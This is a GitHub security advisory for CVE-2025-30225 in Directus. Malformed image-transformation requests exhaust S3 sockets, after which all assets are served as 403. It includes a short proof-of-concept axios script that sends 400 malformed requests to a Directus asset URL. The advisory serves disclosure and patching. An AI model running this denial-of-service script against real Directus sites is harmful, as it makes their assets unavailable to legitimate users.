Skip to content

Directus's S3 assets become unavailable after a burst of malformed transformations

Moderate severity GitHub Reviewed Published Mar 26, 2025 in directus/directus • Updated Mar 27, 2025

Package

npm @directus/storage-driver-s3 (npm)

Affected versions

>= 9.22.0, < 12.0.1

Patched versions

12.0.1
npm directus (npm)
>= 9.22.0, < 11.5.0
11.5.0

Description

Summary

When making many malformed transformation requests at once, at some point, all assets are being served as 403.

Details

When I was investigating this issue, I have found that after a burst of malformed asset transformation requests, the amount of sockets held on Agent on NodeHttpHandler was always equal to STORAGE_CLOUD_MAX_SOCKETS making it impossible to have new connections causing assets to be inaccessible.

After looking into this issue on AWS SDK I found that if the stream is requested, it needs to be consumed otherwise will hang forever. And as can be seen here the stream is not consumed, because sharp will throw an error on the invalid arguments. For example ?height=xyz

The timeouts set here had no noticeable effect on tests made.

PoC

This can be easily reproduced with the following steps:

  • setup AWS S3 storage
  • set STORAGE_CLOUD_MAX_SOCKETS: "50" (this value is lower than default for easier reproduction)
  • upload a file to your project
  • run this file (Replace the the file ID with the one you just uploaded):
import axios from "axios";

async function start() {
  Array.from({ length: 400 }, (_, i) => {
    axios
      .get(
        "http://localhost:8055/assets/e536aa35-3a81-4fa9-b856-3780584d38d8?width=100&height=XYZ"
      )
      .then(() => console.log("✅"))
      .catch((e) =>
        console.log("⛔", e.response?.status || e.code || e.message)
      );
  });
}

start();

Here's an example:

https://github.com/user-attachments/assets/7f5a6f51-1c51-4d4d-aa4f-c4953e91714c

Impact

This causes denial of assets for all policies of Directus, including Admin and Public.

References

@br41nslug br41nslug published to directus/directus Mar 26, 2025
Published by the National Vulnerability Database Mar 26, 2025
Published to the GitHub Advisory Database Mar 26, 2025
Reviewed Mar 26, 2025
Last updated Mar 27, 2025

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(8th percentile)

Weaknesses

CVE ID

CVE-2025-30225

GHSA ID

GHSA-j8xj-7jff-46mx

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.